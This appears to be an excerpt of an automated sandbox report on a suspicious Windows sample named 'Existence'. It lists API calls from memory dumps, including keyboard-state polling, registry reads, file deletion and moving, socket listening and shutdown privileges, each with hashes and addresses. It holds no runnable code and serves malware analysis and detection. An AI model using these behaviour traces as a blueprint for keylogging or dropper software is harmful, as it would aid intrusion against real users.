• RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 007BCA8C
• RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 007BCB47
• RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 007BCBB4
• RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 007BCC49
• RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 007BCC9A
• RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 007BCD43
• RegCloseKey.ADVAPI32(?,?,00000000), ref: 007BCDE2
• RegCloseKey.ADVAPI32(00000000), ref: 007BCDEF
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
• String ID:
• API String ID: 3102970594-0
• Opcode ID: e70894e939a69fed297ea742fd6d2025285efccfc0b93706c4f3366635dedeea
• Instruction ID: b5c9014ff65fd51d47b3d4cfaeb004a6989ba5abdada22fae82e276dd93090a9
• Opcode Fuzzy Hash: e70894e939a69fed297ea742fd6d2025285efccfc0b93706c4f3366635dedeea
• Instruction Fuzzy Hash: C6023A75604200AFD715DF28C895F6ABBE5AF48304F18C4ADF849CB2A2DB35ED46CB61
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetKeyboardState.USER32(?), ref: 0079A65D
• GetAsyncKeyState.USER32(000000A0), ref: 0079A6DE
• GetKeyState.USER32(000000A0), ref: 0079A6F9
• GetAsyncKeyState.USER32(000000A1), ref: 0079A713
• GetKeyState.USER32(000000A1), ref: 0079A728
• GetAsyncKeyState.USER32(00000011), ref: 0079A740
• GetKeyState.USER32(00000011), ref: 0079A752
• GetAsyncKeyState.USER32(00000012), ref: 0079A76A
• GetKeyState.USER32(00000012), ref: 0079A77C
• GetAsyncKeyState.USER32(0000005B), ref: 0079A794
• GetKeyState.USER32(0000005B), ref: 0079A7A6
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: State$Async$Keyboard
• String ID:
• API String ID: 541375521-0
• Opcode ID: 539dd7ae4a8e8916b475031f3daf76b7a360c07cf1e55978e99435f7cafcdb28
• Instruction ID: 907cb1e5384d857b7263738f62c2e9b9bb169f8500ab53babe9d8e03c6a08da0
• Opcode Fuzzy Hash: 539dd7ae4a8e8916b475031f3daf76b7a360c07cf1e55978e99435f7cafcdb28
• Instruction Fuzzy Hash: D241C6645067C97DFF3196A4A8057A5BEB0AB21348F08805DD5C65A2C2EBAC9DC8C7E3
Uniqueness
• Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00735851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007355D1,?,?,00774B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00735871
  • Part of subcall function 0079EAB0: GetFileAttributesW.KERNEL32(?,0079D840), ref: 0079EAB1
• FindFirstFileW.KERNEL32(?,?), ref: 0079D9CD
• DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0079DA88
• MoveFileW.KERNEL32(?,?), ref: 0079DA9B
• DeleteFileW.KERNEL32(?,?,?,?), ref: 0079DAB8
• FindNextFileW.KERNEL32(00000000,00000010), ref: 0079DAE2
  • Part of subcall function 0079DB47: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0079DAC7,?,?), ref: 0079DB5D
• FindClose.KERNEL32(00000000,?,?,?), ref: 0079DAFE
• FindClose.KERNEL32(00000000), ref: 0079DB0F
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
• String ID: \*.*
• API String ID: 1946585618-1173974218
• Opcode ID: 10259a04583da4197bb7606b63d75117ae48431a4aec28fdc9d4492486f6c63f
• Instruction ID: 884b807508b1eff2a426900f65cdb2996de5c980d65154dfeee46e84dac8d11f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 10259a04583da4197bb7606b63d75117ae48431a4aec28fdc9d4492486f6c63f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 32615D7190510DEEDF25EBA4E996DEDB7B5EF14300F2080A9E40277192EB396F09CB60
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: Clipboard$AllocCloseEmptyGlobalOpen
• String ID:
• API String ID: 1737998785-0
• Opcode ID: b1536d7c1648b74eb95fd1cd0bd57ce864c5b20c481e8589a01ae35fecd8a500
• Instruction ID: b912d6577a626b656f5636ee4ec2cdb0e4c59275200d64375faba5d5b269db40
• Opcode Fuzzy Hash: b1536d7c1648b74eb95fd1cd0bd57ce864c5b20c481e8589a01ae35fecd8a500
• Instruction Fuzzy Hash: 0E417931604601EFE320CF55D888F16BBA0BF85358F14C1ADE85A8B662CB3DEC42CB90
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00792010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0079205A
  • Part of subcall function 00792010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00792087
  • Part of subcall function 00792010: GetLastError.KERNEL32 ref: 00792097
• ExitWindowsEx.USER32(?,00000000), ref: 0079F249
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
• String ID: $ $@$SeShutdownPrivilege
• API String ID: 2234035333-3163812486
• Opcode ID: e9ae1e2bf58ded15504296469348032aa0a70fbe0c7ed2090d58f1c969183fbf
• Instruction ID: d24dadaea942f9e3d5380b3a3b8fef5e9aee0b031a031ed0a2a0ed4a392972e0
• Opcode Fuzzy Hash: e9ae1e2bf58ded15504296469348032aa0a70fbe0c7ed2090d58f1c969183fbf
• Instruction Fuzzy Hash: 5F01F97A6102146BEF2463BCBC8AFBF736CBB08354F154535FD12E21D2E56C5D009190
Uniqueness

Uniqueness Score: -1.00%

APIs
• socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 007B1CD3
• WSAGetLastError.WSOCK32 ref: 007B1CE0
• bind.WSOCK32(00000000,?,00000010), ref: 007B1D17
• WSAGetLastError.WSOCK32 ref: 007B1D22
• closesocket.WSOCK32(00000000), ref: 007B1D51
• listen.WSOCK32(00000000,00000005), ref: 007B1D60
• WSAGetLastError.WSOCK32 ref: 007B1D6A
• closesocket.WSOCK32(00000000), ref: 007B1D99
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: ErrorLast$closesocket$bindlistensocket
• String ID:
• API String ID: 540024437-0
• Opcode ID: ebb91e97ed64642f80badddf5843a7b3894c519c84466c1f5692240a9c936976
• Instruction ID: 79f53323cb93a4abbf850866336b963cfa8fffa825294e7ad755a8e8ed6a5d48
• Opcode Fuzzy Hash: ebb91e97ed64642f80badddf5843a7b3894c519c84466c1f5692240a9c936976
• Instruction Fuzzy Hash: 89416E716001009FD720DF28C599B66BBF5AF45318F98C19CE8569F292C779EC81CBE1
Uniqueness

Uniqueness Score: -1.00%

APIs
• _free.LIBCMT ref: 0076BD54
• _free.LIBCMT ref: 0076BD78
• _free.LIBCMT ref: 0076BEFF
• GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,007D46D0), ref: 0076BF11
• WideCharToMultiByte.KERNEL32(00000000,00000000,0080221C,000000FF,00000000,0000003F,00000000,?,?), ref: 0076BF89
• WideCharToMultiByte.KERNEL32(00000000,00000000,00802270,000000FF,?,0000003F,00000000,?), ref: 0076BFB6
• _free.LIBCMT ref: 0076C0CB
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: _free$ByteCharMultiWide$InformationTimeZone
• String ID:
• API String ID: 314583886-0
• Opcode ID: 278adff35f94e9ab376647b1ea3dddc5ccdeafc35f8044cffa2ceb82959d60cc
• Instruction ID: 94bbf3b01e48e1e6e53e4560f50c622b5669df05a85afe14274a56fbdae76246
• Opcode Fuzzy Hash: 278adff35f94e9ab376647b1ea3dddc5ccdeafc35f8044cffa2ceb82959d60cc
• Instruction Fuzzy Hash: 5FC12A71A00204DFDB209F78CC45AEABBB9EF47310F14419AED96DB252E7799E81CB50
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,007756C2,?,?,00000000,00000000), ref: 007A3A1E
• FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,007756C2,?,?,00000000,00000000), ref: 007A3A35
• LoadResource.KERNEL32(?,00000000,?,?,007756C2,?,?,00000000,00000000,?,?,?,?,?,?,007366CE), ref: 007A3A45
• SizeofResource.KERNEL32(?,00000000,?,?,007756C2,?,?,00000000,00000000,?,?,?,?,?,?,007366CE), ref: 007A3A56
• LockResource.KERNEL32(007756C2,?,?,007756C2,?,?,00000000,00000000,?,?,?,?,?,?,007366CE,?), ref: 007A3A65
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: Resource$CreateFindGlobalLoadLockSizeofStream
• String ID: SCRIPT
• API String ID: 3051347437-3967369404
• Opcode ID: 2fd65f0863e7ab18203374d5d25191c38943652d7d99a8bd1d544a32a0fcce62
• Instruction ID: 6becf13621fd97f6c545839b07778276e00674264703109b4289f382829f9b56
• Opcode Fuzzy Hash: 2fd65f0863e7ab18203374d5d25191c38943652d7d99a8bd1d544a32a0fcce62
                                                                                                                                                                                          • Instruction Fuzzy Hash: F0113971200715BFE7318F65DC48F277BBDEBC6B51F14826CB542962A0DBB5ED018A20
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00791900: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00791916
                                                                                                                                                                                            • Part of subcall function 00791900: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00791922
                                                                                                                                                                                            • Part of subcall function 00791900: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00791931
                                                                                                                                                                                            • Part of subcall function 00791900: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00791938
                                                                                                                                                                                            • Part of subcall function 00791900: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0079194E
                                                                                                                                                                                          • GetLengthSid.ADVAPI32(?,00000000,00791C81), ref: 007920FB
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00792107
                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 0079210E
                                                                                                                                                                                          • CopySid.ADVAPI32(00000000,00000000,?), ref: 00792127
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000,00791C81), ref: 0079213B
                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 00792142
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3008561057-0
                                                                                                                                                                                          • Opcode ID: 3a0fcb58dd3a620fa948684cc63f6d8ae95bf70164098d769d2132acc508fa8d
                                                                                                                                                                                          • Instruction ID: f0c9100d86bd2cf623ca1aff22d94010c34bd1edc8981c79350eff1d49fb20dd
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3a0fcb58dd3a620fa948684cc63f6d8ae95bf70164098d769d2132acc508fa8d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0411DC72540209FFDF20AB64EC09FAE7BB9EF40355F15802CE94193121D339AD42CB64
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0073B329: _wcslen.LIBCMT ref: 0073B333
                                                                                                                                                                                          • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 007AA5BD
                                                                                                                                                                                          • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 007AA6D0
                                                                                                                                                                                            • Part of subcall function 007A42B9: GetInputState.USER32 ref: 007A4310
                                                                                                                                                                                            • Part of subcall function 007A42B9: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007A43AB
                                                                                                                                                                                          • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 007AA5ED
                                                                                                                                                                                          • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 007AA6BA
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                                                                                                                          • String ID: *.*
                                                                                                                                                                                          • API String ID: 1972594611-438819550
                                                                                                                                                                                          • Opcode ID: 94f467aa35725537ea848ebab5329a7ad95e56eddcc6853639515da2104865a1
                                                                                                                                                                                          • Instruction ID: ec3631644bdf0f4e9b5a1a442f1b4ed94ee87bdfe11a7c0c6f9a1a7af7e0a2fb
                                                                                                                                                                                          • Opcode Fuzzy Hash: 94f467aa35725537ea848ebab5329a7ad95e56eddcc6853639515da2104865a1
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1841837194020AEFDF14DFA4C849EEEBBB4FF46310F248159E805A2191EB789E54CF61
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • DefDlgProcW.USER32(?,?), ref: 0073233E
                                                                                                                                                                                          • GetSysColor.USER32(0000000F), ref: 00732421
                                                                                                                                                                                          • SetBkColor.GDI32(?,00000000), ref: 00732434
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Color$Proc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 929743424-0
                                                                                                                                                                                          • Opcode ID: 707590033c235973d419380ca6e6ff6b23240eca3a97097c318de3b72fa12d1b
                                                                                                                                                                                          • Instruction ID: b63ede6c46b6a93afadd7f509a304b3f6b85aee1de1cfc1a8d23a552ee76c1ef
                                                                                                                                                                                          • Opcode Fuzzy Hash: 707590033c235973d419380ca6e6ff6b23240eca3a97097c318de3b72fa12d1b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 838118F1108454BEFA2D6A3C8C9CE7F265EEB42340F15811DF202D6597CA6E9F43A276
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 007B3AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 007B3AD7
                                                                                                                                                                                            • Part of subcall function 007B3AAB: _wcslen.LIBCMT ref: 007B3AF8
                                                                                                                                                                                          • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 007B22BA
                                                                                                                                                                                          • WSAGetLastError.WSOCK32 ref: 007B22E1
                                                                                                                                                                                          • bind.WSOCK32(00000000,?,00000010), ref: 007B2338
                                                                                                                                                                                          • WSAGetLastError.WSOCK32 ref: 007B2343
                                                                                                                                                                                          • closesocket.WSOCK32(00000000), ref: 007B2372
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1601658205-0
                                                                                                                                                                                          • Opcode ID: 6f2c9ee4085795f01f6041f7429b88ecece283d9f30ef1af00435eb566f3a2d7
                                                                                                                                                                                          • Instruction ID: 54b1712388ea2d9158c3882d8e023e5337b9e64795fd1c9dfc83402b587f7fa3
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6f2c9ee4085795f01f6041f7429b88ecece283d9f30ef1af00435eb566f3a2d7
                                                                                                                                                                                          • Instruction Fuzzy Hash: A051B3B1A00200EFE720AF24C88AF6A77E5AB44754F54849CF9459F3D3D779AD42CBA1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: Window$EnabledForegroundIconicVisibleZoomed
• String ID:
• API String ID: 292994002-0
• Opcode ID: e4fca198791d40e4edeb493ad18bfbdbdca81dd28b9ddf2b289d12f76d3eb080
• Instruction ID: 7e4859a7684a1806eaf78f23d8b6d0e448c49fc56d3455c62540aacff148aaa4
• Opcode Fuzzy Hash: e4fca198791d40e4edeb493ad18bfbdbdca81dd28b9ddf2b289d12f76d3eb080
• Instruction Fuzzy Hash: 8221E235700210CFE7219F26C888F5A7BA5EF85324F18806CE94A8B253DB79ED43CB90
Uniqueness
• Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: LocalTime
• String ID: %.3d$X64
• API String ID: 481472006-1077770165
• Opcode ID: a1475c196ceba8a42493815ff083cc6a765961afd708f93932265ea94867ad8e
• Instruction ID: 61aa0f4b9d092abaeb4b7cde21dd624ea77df503d3378260f93d9f5740dea4a1
• Opcode Fuzzy Hash: a1475c196ceba8a42493815ff083cc6a765961afd708f93932265ea94867ad8e
• Instruction Fuzzy Hash: 13D012B1D48118D6CBD0A7909C48CBD737CBB18300F508466F90691010F72C99049721
Uniqueness
• Uniqueness Score: -1.00%

APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 00762A8A
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 00762A94
• UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 00762AA1
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
• Opcode ID: 464898280ce6c9ed03ef235443484bda26bbceba945a3e46aabe159b733c5cee
• Instruction ID: ec49e768d6abc9e7ab3bce60e571f03ab44986bb9046136d23affbc29c5d572a
• Opcode Fuzzy Hash: 464898280ce6c9ed03ef235443484bda26bbceba945a3e46aabe159b733c5cee
• Instruction Fuzzy Hash: F231D77490131C9BCB21DF64D9887DDBBB4AF08311F5081EAE80CA6251E7749F858F45
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetUserNameW.ADVAPI32(?,?), ref: 0078E664
Strings
Memory Dump Source
